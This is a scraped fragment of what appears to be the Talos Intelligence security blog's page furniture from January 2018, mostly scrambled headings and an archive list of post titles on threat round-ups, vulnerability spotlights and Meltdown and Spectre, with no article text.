**P** **O** **S** **P** **T** **A** **E** **U** **D** **L** **A** **1BRT** **2Y** **A** **:** **S** **5** **C** **7** **A** **G** **A** **N** **M** **E** **R** **E**
**L** **A** **A** **[B](http://blog.talosintelligence.com/search/label/APT)** **,** **EP** **E** **XT** **L** **,** **HP** **S** **,** **WKL** **:** **OPO,** **M** **RI** **A** **TE** **L** **A** **W** **,AO** **RF** **,** **R** **[EF](http://blog.talosintelligence.com/search/label/RAT)** **,** **RA** **I** **OTRC** **K** **EE**
**S** **H** **A** **R** **E** **T** **H** **I** **S**
**P** **O** **S** **T**
**NO COMMENTS:**
**POST A COMMENT**
**Enter your comment...**
**PublishPublish**
-----
**H** **O** **M** **E**
**O** **L**
**P** **O**
**S** **U** **B** **SP** **CO** **RS** **IT** **B** **EC** **O** **T** **M** **O** **M** **:** **E** **N** **T** **S**
**Search Blog**
**S** **U** **B** **S** **C** **R** **I** **B** **E** **T** **O** **O** **U** **R**
**Posts**
**Comments**
**Subscribe via Email**
**B** **L** **O** **G** **A** **R** **C** **H** **I** **V** **E**
**[▼ 2](javascript:void(0))** **0(10)** **1** **8**
**[▼ J](javascript:void(0))** **A** **(10)N** **U** **A** **R** **Y**
**Korea In The Crosshairs**
**[Threat Round Up for January 5 - 12](http://blog.talosintelligence.com/2018/01/threat-round-up-0105-0512.html)**
**[Vulnerability Spotlight: Multiple Unpatched Vulner...](http://blog.talosintelligence.com/2018/01/unpatched-blender-vulns.html)**
**[Vulnerability Spotlight: Ruby Rails Gem XSS Vulner...](http://blog.talosintelligence.com/2018/01/vulnerability-spotlight-ruby-rails-gem.html)**
**[Microsoft Patch Tuesday - January 2018](http://blog.talosintelligence.com/2018/01/ms-tuesday.html)**
**[Vulnerability Spotlight: Multiple Vulnerabilities ...](http://blog.talosintelligence.com/2018/01/vulnerability-spotlight-multiple.html)**
**[Meltdown and Spectre](http://blog.talosintelligence.com/2018/01/meltdown-and-spectre.html)**
**[Threat Round Up for December 29 - January 5](http://blog.talosintelligence.com/2018/01/threat-round-up-1229-0105.html)**
**[Not So Crystal Clear - Zeus Variant Spoils Ukraini...](http://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html)**
**[Tutorial: Mutiny Fuzzing Framework and Decept Prox...](http://blog.talosintelligence.com/2018/01/tutorial-mutiny-fuzzing-framework-and.html)**
**[► 2](javascript:void(0))** **0(172)** **1** **7**
**[► 2](javascript:void(0))** **0(98)** **1** **6**
**[► 2](javascript:void(0))** **0(62)** **1** **5**
**[► 2](javascript:void(0))** **0(67)** **1** **4**
**[► 2](javascript:void(0))** **0(30)** **1** **3**
**[► 2](javascript:void(0))** **0(53)** **1** **2**
**[► 2](javascript:void(0))** **0(23)** **1** **1**
**[► 2](javascript:void(0))** **0(93)** **1** **0**
**[► 2](javascript:void(0))** **0(146)** **0** **9**
**[► 2](javascript:void(0))** **0(37)** **0** **8**
**Search Blog**
-----
**[Demos: Cisco Application Centric Infrastructure (ACI) 2017-2018 Updates](https://blogs.cisco.com/datacenter/demos-cisco-application-centric-infrastructure-aci-2017-2018-updates)**
**C** **L** **A** **M** **A** **V** **®** **B** **L** **O** **G**
**[ClamAV List Server Upgrade](https://feedproxy.google.com/~r/Clamav/~3/2pJfCOf0zlw/clamav-list-server-upgrade.html)**
**S** **[N](http://blog.snort.org/)** **O** **R** **T** **B** **L** **O** **G**
**[Snort Subscriber Rule Set Update for 01/09/2018, MSTuesday](https://feedproxy.google.com/~r/Snort/~3/RGjKLlRXvHQ/snort-subscriber-rule-set-update-for_9.html)**
-----